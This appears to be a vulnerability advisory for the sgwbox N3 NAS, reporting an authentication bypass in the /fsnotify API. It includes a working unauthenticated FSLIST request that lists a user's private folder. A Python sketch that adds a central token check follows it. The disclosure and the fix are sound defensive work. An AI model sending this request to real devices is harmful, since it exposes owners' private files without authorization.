Vendor: sgwbox
Affected products: N3 NAS ≤ V2.0.25
Vendor Homepage: https://mall.sgwbox.com/
Vendor contact information: mailto:box@new1cloud.com

The sgwbox N3 NAS has an authentication bypass vulnerability. It is caused by the device not actually verifying the token field passed in POST messages. A remote, unauthenticated attacker can use it to disclose internal information from the NAS, make the NAS device carry out specific instructions, etc.
Without authenticating, an attacker sends a JSON-format POST request to the /fsnotify API interface with no token information at all:
{
"jsonparam": "{\"path\":\"/mnt/usb1/.safe_home/winmt/\",\"type\":0,\"hasbaseinfo\":false,\"limit\":500,\"folderonly\":true,\"regonly\":false,\"withhidden\":false,\"order\":3,\"desc\":true,\"baseinfo\":{}}",
"protobufparam": "",
"cmd": "FSLIST"
}

This request retrieves file information from a user's private folder (which normal users need a password to access).

Note that this issue exists not only with this interface, but with all functions across all interfaces.
NASchecker
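
Because the advisory says every function on every interface is affected, the missing check belongs in one gate that runs before any command is dispatched. The sketch below is an added example, not the vendor's code: the "token" field name, the session store and the function names are all assumptions made for illustration.

```python
import hmac
import json

# Hypothetical session store (constructed sample): token -> user name.
SESSIONS = {"3f9c1e7a5b2d4c68": "alice"}


class AuthError(Exception):
    """Raised when a request carries no valid session token."""


def verify_token(request: dict) -> str:
    """Return the user bound to the request's token, or raise AuthError."""
    token = request.get("token")  # field name "token" is an assumption
    if not isinstance(token, str) or not token:
        raise AuthError("missing token")
    for known, user in SESSIONS.items():
        # Constant-time comparison so timing does not leak token contents.
        if hmac.compare_digest(known.encode(), token.encode()):
            return user
    raise AuthError("unknown token")


def fs_list(user: str, params: dict) -> dict:
    """Stand-in for the FSLIST command; echoes what would be listed."""
    return {"user": user, "path": params["path"]}


HANDLERS = {"FSLIST": fs_list}


def handle_fsnotify(raw_body: str) -> tuple[int, dict]:
    """Authenticate first, then look up cmd and parse jsonparam."""
    try:
        request = json.loads(raw_body)
        if not isinstance(request, dict):
            raise ValueError("body must be a JSON object")
        user = verify_token(request)  # runs before any command is touched
        handler = HANDLERS[request["cmd"]]
        return 200, handler(user, json.loads(request["jsonparam"]))
    except AuthError as exc:
        return 401, {"error": str(exc)}
    except (KeyError, TypeError, ValueError):
        return 400, {"error": "bad request"}
```

A request shaped like the one in the advisory, with no token field, gets a 401 from this gate and never reaches the FSLIST handler.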